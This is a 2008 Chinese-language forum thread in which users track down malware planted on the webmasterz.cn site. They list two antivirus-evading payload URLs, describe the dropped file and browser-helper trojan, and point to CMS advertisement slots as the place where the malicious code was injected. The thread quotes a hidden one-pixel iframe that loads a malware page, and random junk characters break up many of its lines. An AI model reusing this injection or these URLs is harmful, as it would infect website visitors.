webmasterz.cn上的掛馬掛在哪了 我怎麼查了半天查不到？

請老大仔細的查查吧，剛又發現了幾個，全是免殺的~~一個勁的往外蹦，但是我的卡卡即不報~~
http://ppp.749571.com/dm/test.htm
) ]  g: y+ F5 w! `! |6 F8 {http://www.985676.cn/encrypt/mm.htm
1 [# ~8 x1 Q% r, T這兩個是免殺的，還有幾個沒記下來，
- j8 H0 Y  i/ ?( k+ \這掛馬的兔崽子有一手，隱藏的很好啊~~一般人都看不出來~

會在C盤下產生 CRESS1.EXE
; o* K+ b! k. v& W. h然後增加IE的BHO的木馬 還釋放驅動

昏 他藏得好隱秘  找到了 放毒得地方了

/ t) L& }- a% |6 R4 @) @8 _iframe src=h t t p://w w w.9856 76.cn/encrypt/mm.htm width=1 height=1></iframe>
  I. B1 C2 v3 ]2 y然後再這個地址轉到ppp.749571.co m/dm/test.htm
為了跟蹤這個病毒 自己失誤的。。。。哎。修復中ing。。。。
靜水趕快清理了吧

原帖由 20082008 於 2008-1-9 16:33 發表
沒裝REAL就沒事，好在我重新裝的系統:

  \$ x% s& y& m* C) x# y4 P說的沒錯

原帖由 freelzyr 於 2008-1-10 16:47 發表
  |, ?: U- Z/ f; `0 v進dede後台
檢查 ad_js.php?aid=1  
* A" a$ u, G0 Uad_js.php?aid=2
8 _! s* M+ s0 U6 d0 U& H/ \ad_js.php?aid=3
+ D8 _8 w7 P( Z9 b0 X' _ad_js.php?aid=4
" X: p; O2 O6 S
這幾個廣告 裡面的代碼
1 ?& S+ p  g7 Z在這幾個 掉茅廁位 裡面   含有 木馬的 代碼

/ G0 C% B$ `# w5 K! `這個檢查了沒有的

原帖由 靜水流深 於 2008-1-11 02:27 發表
5 y8 ~: [- ]& Y7 \9 T4 L) {
9 K1 n  T; u, Q1 G+ c6 {2 O3 B
這個檢查了沒有的

+ e: h- S( e  c6 ^0 p6 j# F  l; D
1 J+ _- \; Q5 x- A" C8 }我看過了，有掛馬的代碼，代碼已經在你的另一個貼子裡貼出來了

原帖由 靜水流深 於 2008-1-11 02:27 發表
9 K0 T# d( V5 Z4 Q+ h- l. M

: n2 Z1 D9 X- o% ?2 {0 A; j這個檢查了沒有的

木馬就是在這裡裡啊
在後台的掉茅廁位設置那
裡

現在明瞭.
" K/ K8 Y" r( X# x8 S7 R有人收流量做ppp.749571.co m的..
! F1 O! v* d# E最近被掛馬的話. 都改成js了. 不用iframe了

菜鳥,怕怕,不敢看,啥時好了說一聲,我再去看風景